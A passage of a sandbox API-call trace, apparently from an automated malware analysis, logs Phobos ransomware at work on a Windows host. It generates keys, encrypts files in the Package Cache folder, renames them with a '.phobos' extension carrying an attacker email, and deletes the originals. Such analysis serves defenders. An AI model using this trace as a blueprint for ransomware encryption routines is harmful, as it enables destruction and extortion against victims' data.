(hObject=0x178) returned 1 [0181.777] CloseHandle (hObject=0x134) returned 1 [0181.777] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 1 [0181.791] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0181.792] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0181.792] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=5153816) returned 1 [0181.792] CloseHandle (hObject=0x134) returned 1 [0181.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0181.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0181.839] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0181.840] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0181.840] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0181.840] ReadFile (in: hFile=0x134, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0181.939] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a36b2, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0181.939] ReadFile (in: hFile=0x134, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0182.037] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x4aa418, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0182.037] ReadFile (in: hFile=0x134, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0182.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32ae8) returned 1 [0182.243] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0182.243] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0182.249] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.249] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0182.249] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0182.271] SetEndOfFile (hFile=0x134) returned 1 [0182.271] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x4aa418, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0182.271] WriteFile (in: hFile=0x134, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0182.273] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a36b2, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0182.273] WriteFile (in: hFile=0x134, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0182.275] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0182.275] WriteFile (in: hFile=0x134, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0182.276] CloseHandle (hObject=0x134) returned 1 [0182.276] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0182.276] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0182.295] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=455576) returned 1 [0182.295] CloseHandle (hObject=0x178) returned 1 [0182.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe")) returned 0x20 [0182.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.295] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0182.295] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0182.295] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0182.295] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0182.295] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0182.296] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0182.296] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6f398, lpOverlapped=0x0) returned 1 [0182.435] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f3a0, dwBufLen=0x6f3a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f3a0) returned 1 [0182.438] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6f3a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6f3a0, lpOverlapped=0x0) returned 1 [0182.446] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0182.446] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0182.446] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0182.446] CryptDestroyKey (hKey=0xa327e8) returned 1 [0182.446] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0182.447] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.447] CloseHandle (hObject=0x178) returned 1 [0182.447] CloseHandle (hObject=0x17c) returned 1 [0182.447] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe")) returned 1 [0182.452] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0182.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0182.453] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=151552) returned 1 [0182.453] CloseHandle (hObject=0x17c) returned 1 [0182.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0182.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.453] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0182.454] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0182.454] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0182.454] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0182.454] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0182.454] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0182.454] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x25000, lpOverlapped=0x0) returned 1 [0182.691] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x25010, dwBufLen=0x25010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x25010) returned 1 [0182.692] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x25010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x25010, lpOverlapped=0x0) returned 1 [0182.694] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0182.694] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0182.694] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0182.694] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.694] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0182.695] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.695] CloseHandle (hObject=0x17c) returned 1 [0182.695] CloseHandle (hObject=0x178) returned 1 [0182.695] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 1 [0182.696] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0182.696] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0182.997] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=143360) returned 1 [0182.997] CloseHandle (hObject=0x15c) returned 1 [0182.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0182.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.997] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0182.998] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0182.998] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0182.998] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0182.998] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d68) returned 1 [0182.998] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0182.998] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x23000, lpOverlapped=0x0) returned 1 [0183.109] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x23010, dwBufLen=0x23010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x23010) returned 1 [0183.110] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x23010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x23010, lpOverlapped=0x0) returned 1 [0183.113] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0183.113] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.113] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0183.113] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0183.114] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0183.114] CryptDestroyKey (hKey=0xa32d68) returned 1 [0183.114] CloseHandle (hObject=0x15c) returned 1 [0183.114] CloseHandle (hObject=0x178) returned 1 [0183.114] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 1 [0183.116] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0183.116] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0183.117] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=766) returned 1 [0183.117] CloseHandle (hObject=0x178) returned 1 [0183.117] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm")) returned 0x20 [0183.117] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.117] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0183.117] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.117] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.117] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0183.121] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, 